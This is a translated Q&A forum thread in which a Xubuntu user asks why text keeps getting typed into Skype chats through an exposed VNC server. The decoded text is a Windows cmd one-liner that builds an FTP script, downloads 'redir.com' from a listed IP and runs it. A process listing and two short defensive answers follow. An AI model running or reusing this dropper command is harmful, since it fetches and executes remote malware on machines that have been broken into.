O
O
Olegi42012-06-30 22:07:26
linux
Olegi4, 2012-06-30 22:07:26

Skype in Xubuntu automatically sends commands to the chat for the Windows command line. How does this happen?

From the user in my contact list comes (all this is typed into the active chat window itself - there is no one at the computer):
%ыныеуькщще%\ыныеуь32\сьвюучу вуд уй?усрщ щзут 78ю84ю206ю167 26578 ЮЮ уй?усрщ гыук 22725 24588 ЮЮ уй ?усрщ пуе кувшкюсщь ЮЮ уй ?усрщ йгше ЮЮ уй ?аез -т -ыЖуй ?кувшкюсщь ?вуд уй

image

If we convert Russian letters into Latin letters on the same keys, we get:
%systemroot%\system32\cmd.exe del eq&echo open 78.84.206.167 26578 >> eq&echo user 22725 24588 >> eq &echo get redir.com >> eq &echo quit >> eq &ftp -n -s:eq &redir.com &del eq

The output of the processes looks like this:
[email protected]:~$ ps ax
PID TTY STAT TIME COMMAND
1? Ss 0:00 /sbin/init
2? S 0:00 [kthreadd]
3? S 0:01 [ksoftirqd/0]
5? S 0:01 [kworker/u:0]
6? S 0:00 [migration/0]
7? S 0:00 [watchdog/0]
8? S < 0:00 [cpuset]
9? S < 0:00 [khelper]
10? S 0:00 [kdevtmpfs]
11? S < 0:00 [netns]
12? S 0:00 [sync_supers]
13? S 0:00 [bdi-default]
14? S < 0:00 [kintegrityd]
15? S < 0:00 [kblockd]
sixteen? S< 0:00 [ata_sff]
17? S 0:00 [khubd]
18? S< 0:00 [md]
21? S 0:00 [khungtaskd]
22? S 0:00 [kswapd0]
23? SN 0:00 [ksmd]
24? SN 0:00 [khugepaged]
25? S 0:00 [fsnotify_mark]
26? S 0:00 [ecryptfs-kthrea]
27? S< 0:00 [crypto]
35? S < 0:00 [khrotld]
40? S 0:00 [scsi_eh_0]
41? S 0:00 [scsi_eh_1]
42? S 0:00 [scsi_eh_2]
43? S 0:00 [scsi_eh_3]
46? S 0:00 [scsi_eh_4]
48? S 0:00 [kworker/u:7]
70? S< 0:00 [devfreq_wq]
197? S < 0:00 [firewire]
223? S 0:00 [jbd2/sda1-8]
224? S< 0:00 [ext4-dio-unwrit]
242? S 0:00 [flush-8:0]
309? S 0:00 upstart-udev-bridge --daemon
315? Ss 0:00 /sbin/udevd --daemon
495? Ss 0:00 dbus-daemon --system --fork --activation=upstart
529? Ss 0:00 /usr/sbin/modem-manager
530? Ss 0:00 /usr/sbin/bluetoothd
553? S 0:00 /sbin/udevd --daemon
554? S 0:00 /sbin/udevd --daemon
582? Ssl 0:00 NetworkManager
583? Sl 0:00 rsyslogd -c5
585? S< 0:00 [krfcommd]
591? S 0:00 avahi-daemon: running [xubuntu.local]
592? S 0:00 avahi-daemon: chroot helper
594? Ss 0:00 /usr/sbin/cupsd -F
599? Sl 0:00 /usr/lib/policykit-1/polkitd --no-debug
630? S< 0:00 [kmemstick]
631? S< 0:00 [cfg80211]
633? S < 0:00 [hci0]
635? S 0:00 [r592_io]
646? S< 0:00 [r852]
648? S < 0:00 [kpsmoused]
658? S< 0:00 [iwl3945]
748? S 0:00 upstart-socket-bridge --daemon
832? S< 0:00 [hd-audio0]
876 tty4 Ss+ 0:00 /sbin/getty -8 38400 tty4
882? Ss 0:04 /opt/logmein-hamachi/bin/hamachid
883 tty5 Ss+ 0:00 /sbin/getty -8 38400 tty5
897 tty2 Ss+ 0:00 /sbin/getty -8 38400 tty2
898 tty3 Ss+ 0:00 /sbin /getty -8 38400 tty3
906 tty6 Ss+ 0:00 /sbin/getty -8 38400 tty6
924? Ss 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
930? Ss 0:00 cron
931? Ss 0:00 atd
933? Ssl 0:00 lightdm
971? S 0:00 /sbin/dhclient -d -4 -sf /usr/lib/NetworkManager/nm-d
990? Ss 0:00 /sbin/wpa_supplicant -B -P /run/sendsigs.omit.d/wpasu
1003 tty7 Ss+ 3:27 /usr/bin/X :0 -auth /var/run/lightdm/root/:0 - noliste
1156 tty1 Ss+ 0:00 /sbin/getty -8 38400 tty1
1161? Sl 0:00 lightdm --session-child 12 15
1164? Sl 0:00 /usr/lib/accountsservice/accounts-daemon
1167? Sl 0:00 /usr/sbin/console-kit-daemon --no-daemon
1242? Ss 0:00 /bin/sh /etc/xdg/xfce4/xinitrc - /etc/X11/xinit/xser
1274? Ss 0:00 /usr/bin/ssh-agent /usr/bin/dbus-launch --exit-with-s
1277? S 0:00 /usr/bin/dbus-launch --exit-with-session startxfce4
1278? Ss 0:00 //bin/dbus-daemon --fork --print-pid 5 --print-addres
1286? S 0:00 /usr/lib/xfce4/xfconf/xfconfd
1292? S 0:00 xscreensaver -no-splash
1294? Sl 0:00 xfce4-session
1299? R 0:07 xfwm4 --replace --display :0.0 --sm-client-id 2197b57
1301? S 0:00 xfsettingsd --force
1302? S 0:00 Thunar --sm-client-id 2850f410b-2b5d-4b02-a09c-8babb4
1303? S 0:00 /usr/sbin/dnsmasq --no-resolv --keep-in-foreground - 1317? S 0:00 /usr/lib/gvfs/gvfsd
1323? Sl 0:00 /usr/lib/gvfs//gvfs-fuse-daemon -f /home/jury/.gvfs
1324? Sl 0:05 xfce4-panel --display :0.0 --sm-client-id 2b36910b5-6
1342? S 0:00 xfdesktop --display :0.0 --sm-client-id 25e5d684f-707
1347? Sl 4:53 skype -session 2565a2699-83c9-42fc-bc26-cb1a56ce6f6c_
1350? Ssl 0:00 xfce4-power-manager --restart --sm-client-id 27da1e81
1354? S 0:15 xfce4-settings-helper --display :0.0 --sm-client-id 2
1381? Sl 0:00 /usr/lib/upower/upowerd
1549? S 0:00 /usr/lib/i386-linux-gnu/xfce4/panel/wrapper /usr/lib/
1551? S 0:00 /usr/lib/i386-linux-gnu/xfce4/panel-plugins/xfce4-ora
1554? S 0:00 /usr/lib/i386-linux-gnu/xfce4/panel-plugins/xfce4-wea
1555? S 0:04 /usr/lib/i386-linux-gnu/xfce4/panel-plugins/xfce4-xkb
1558? S 0:00 /usr/lib/gvfs/gvfs-gdu-volume-monitor
1560? Sl 0:00 /usr/lib/udisks/udisks-daemon
1561? S 0:00 udisks-daemon: not polling any devices
1564? S 0:00 /usr/lib/gvfs/gvfs-gphoto2-volume-monitor
1566? Sl 0:00 /usr/lib/gvfs/gvfs-afc-volume-monitor
1571? S 0:00 /usr/lib/i386-linux-gnu/gconf/gconfd-2
1574? S 0:00 /usr/lib/gvfs/gvfsd-trash --spawner :1.9 /org/gtk/gvf
1577? Sl 6:16 /home/jury/firefox-en/firefox-en
1579? S 0:22 x11vnc -display :0 -forever
1590? Sl 0:00 zeitgeist-datahub
1594? S<l 0:55 /usr/bin/pulseaudio --start --log-target=syslog
1596? SNl 0:00 /usr/lib/rtkit/rtkit-daemon
1600? Sl 0:00 /usr/lib/policykit-1-gnome/polkit-gnome-authenticatio
1610? Sl 0:00 /usr/bin/zeitgeist-daemon
1612? Ssl 0:03 xfce4-volumed
1614? S 0:00 orage
1647? Sl 0:00 /usr/lib/zeitgeist/zeitgeist-fts
1667? S 0:00 /bin/cat
1676? Sl 0:00 /usr/lib/i386-linux-gnu/at-spi2-core/at-spi-bus-launc
1720? Sl 1:49 /home/jury/firefox-ru/plugin-container /usr/lib/flash
1842? S 0:00 [kworker/0:1]
1855? S 0:00 [kworker/u:1]
1922? S 0:00 [kworker/0:0]
1923? S 0:28 xfce4-taskmanager
1932? S 0:00 [kworker/0:2]
1938? Sl 0:00 /usr/bin/xfce4-terminal
1939? Z 0:00 [xfce4-terminal] 1940 pts/0 Ss 0:00 bash
1995 pts/0 R+ 0:00 ps ax

From the non-standard - Hamachi and VNC server are permanently installed on the remote computer.

I found the only mention of such a problem on the Internet - www.linux-bg.org/forum/index.php?topic=43213.0 The

question is actually what it can be and how to defeat it?

Thank you!

Answer the question

In order to leave comments, you need to log in

2 answer(s)
V
Vladimir Dubrovin, 2012-06-30
@Olegi4

Perhaps someone bruteforces / breaks VNC with a script, in your case successfully, but the script is tailored for Windows, so this is the effect. Change passwords, firewall VNC so that access is only from the allowed list of networks.

O
oia, 2012-06-30
@oia

can check the computer for viruses, see what connections are happening netstat check autoload

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question